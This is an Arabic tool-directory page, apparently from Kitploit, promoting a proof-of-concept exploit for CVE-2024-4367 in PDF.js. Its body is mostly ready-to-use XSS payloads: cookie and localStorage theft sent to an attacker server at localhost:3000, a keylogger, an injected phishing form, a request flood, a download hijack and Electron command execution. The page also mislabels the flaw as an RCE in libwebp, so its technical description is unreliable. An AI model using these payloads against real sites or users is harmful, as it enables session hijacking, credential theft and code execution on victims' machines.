Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4367-POC-PDFJS — PoC (إثبات المفهوم) الخاص بـ CVE-2024-4367 - ثغرة RCE في libwebp. عرض توضيحي كامل يتضمن: إنشاء الحمولات (payloads)، سيناريوهات الهجوم، تحليل المخاطر، وخادم اختبار Express.js. | Kitploit
أدوات/GitHubGitHub/elamani-drawing/cve-2024-4367-poc-pdfjs
أدوات التصيدتوليد الحمولةالاستغلالاستغلال تطبيقات الويبتسريب البياناتالهندسة الاجتماعيةالتعلم والتعليم
GitHubelamani-drawing/cve-2024-4367-poc-pdfjs

CVE-2024-4367-POC-PDFJS

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC (إثبات المفهوم) الخاص بـ CVE-2024-4367 - ثغرة RCE في libwebp. عرض توضيحي كامل يتضمن: إنشاء الحمولات (payloads)، سيناريوهات الهجوم، تحليل المخاطر، وخادم اختبار Express.js.

عرض المستودع
16منذ سنة واحدةلم تتم المراجعة بعد

CVE 2024 4367: PoC لاستغلال XSS (Cross-Site Scripting)

1. عرض تنبيه (تفعيل XSS)

مثال آخر على الاستغلال يتمثل في حقن رسالة تنبيه بسيطة للتحقق من نجاح الهجوم.

root@kitploit:~
python poc.py "alert('XSS exploit triggered');"
  • الشرح: يحقن هذا الكود نافذة تنبيه منبثقة في الصفحة، مما يتيح اختبار ما إذا كان استغلال XSS يُنفَّذ على الموقع المستهدف بسرعة.

2. سرقة ملفات تعريف الارتباط (Cookies)

يمكن استخدام هجوم XSS لسرقة ملفات تعريف الارتباط الخاصة بالضحية وإرسالها إلى خادم خبيث.

root@kitploit:~
python poc.py "fetch('http://localhost:3000/cookie', {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cookie: document.cookie})});"
  • الشرح: يعدّل السكريبت عنوان URL للصفحة ليتضمن ملفات تعريف الارتباط الخاصة بالضحية، والتي تُرسل بعد ذلك إلى خادم خبيث (http://localhost:3000/cookie).

3. سرقة البيانات المخزنة محليًا (LocalStorage)

يمكن للمهاجم سرقة معلومات حساسة مخزنة في localStorage الخاص بالضحية، مثل بيانات المصادقة أو معلومات الجلسة.

root@kitploit:~
python poc.py "fetch('http://localhost:3000/localstorage', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({localstorage: JSON.stringify(localStorage)})});"
  • الشرح: يسترجع الكود البيانات الحساسة المخزنة في localStorage ويرسلها إلى خادم خبيث عبر طلب fetch.

4. إعادة توجيه خبيثة

يمكن للمهاجم إعادة توجيه الضحية إلى موقع خبيث لجمع معلومات إضافية أو تحميل استغلال آخر.

root@kitploit:~
python poc.py "window.location.href='http://localhost:3000';"
  • الشرح: يعيد هذا السكريبت توجيه الضحية فورًا إلى موقع خبيث، ويمكن استخدام ذلك في هجمات التصيد أو لتثبيت برمجيات خبيثة.

5. هجوم DDoS (إغراق API)

نوع آخر من الهجمات يتمثل في إغراق خادم بالطلبات، مما قد يؤدي إلى تدهور الأداء أو انقطاع الخدمة.

root@kitploit:~
python poc.py  "for (let i = 0; i < 100; i++) { fetch('http://localhost:3000/api'); }"
  • الشرح: يرسل السكريبت 100 طلب HTTP إلى واجهة برمجة تطبيقات (API) مستهدفة، مما قد يؤدي إلى إرهاق الخادم (هجوم حجب الخدمة).

6. Keylogger (اعتراض ضغطات المفاتيح)

يمكن للمهاجم اعتراض ضغطات لوحة مفاتيح الضحية، مما يتيح له الحصول على معلومات حساسة مثل كلمات المرور أو أسماء المستخدمين.

root@kitploit:~
python poc.py """document.addEventListener('keydown', function(e) {
    fetch('http://localhost:3000/keylogger?key=' + e.key);
});"""
  • الشرح: يسجل هذا السكريبت كل مفتاح يضغطه الضحية ويرسل هذه المعلومات إلى خادم خبيث.

7. تصيد عبر نموذج محقون (سرقة بيانات حساسة)

يمكن للمهاجم استخدام XSS لحقن نموذج تصيد في صفحة ويب وبالتالي سرقة معلومات حساسة (مثل: كلمة المرور، اسم المستخدم).

root@kitploit:~
python poc.py """
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:3000/phishing';
var input = document.createElement('input');
input.type = 'text';
input.name = 'username';
form.appendChild(input);
document.body.appendChild(form);
form.submit();
"""
  • الشرح: يحقن هذا الكود نموذجًا في الصفحة، مما يسمح للمهاجم بالحصول على معلومات حساسة يقدمها المستخدم عبر نموذج التصيد هذا.

8. اختطاف التنزيل

إذا كان المستخدم على وشك النقر على زر تنزيل، فسنقوم بتغيير وجهة التنزيل.

root@kitploit:~
const a = document.createElement('a');
a.href = "https://example.com/fichier.pdf";
a.download = "fichier.pdf"; 
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
  • الشرح: يقوم هذا السكريبت بتحديث رابط وجهة التنزيل، والفكرة هي تعديل زر موجود بحيث يقوم بتنزيل ملف خبيث بدلاً من الملف الذي يعتزم المستخدم تنزيله.

9. هجمات على تطبيقات سطح المكتب (Electron, NW.js)

root@kitploit:~
python poc.py "require('child_process').exec('calc.exe')"

يمكن أيضًا أن تتأثر التطبيقات المبنية على أطر عمل مثل Electron أو NW.js بهجمات XSS، لأنها تتيح دمج محتوى الويب في تطبيقات سطح المكتب بصلاحيات وصول محلية موسعة.
هذه التطبيقات، نظرًا لصلاحياتها، يمكن أن تسمح للمهاجم بالوصول إلى ملفات محلية، أو تنفيذ عمليات خارجية، أو حتى تشغيل تطبيقات أخرى على الجهاز المستهدف (على سبيل المثال، الآلة الحاسبة، محرر نصوص، وما إلى ذلك). وهذا يزيد من سطح الهجوم بشكل كبير، حيث تجمع هذه التطبيقات بين قوة الويب وصلاحيات وصول أوسع إلى النظام.


الخلاصة

يمكن للهجمات التي تستغل ثغرات CVE (Common Vulnerabilities and Exposures) أن تتيح تنفيذ أنواع مختلفة من هجمات XSS. فمن خلال استغلال ثغرات محددة في تطبيقات الويب أو تطبيقات سطح المكتب، يمكن للمهاجم حقن تعليمات برمجية خبيثة، أو سرقة معلومات حساسة، أو التلاعب بجلسات المستخدم، أو تنفيذ إجراءات خبيثة على النظام المستهدف.

تنزيل الأداة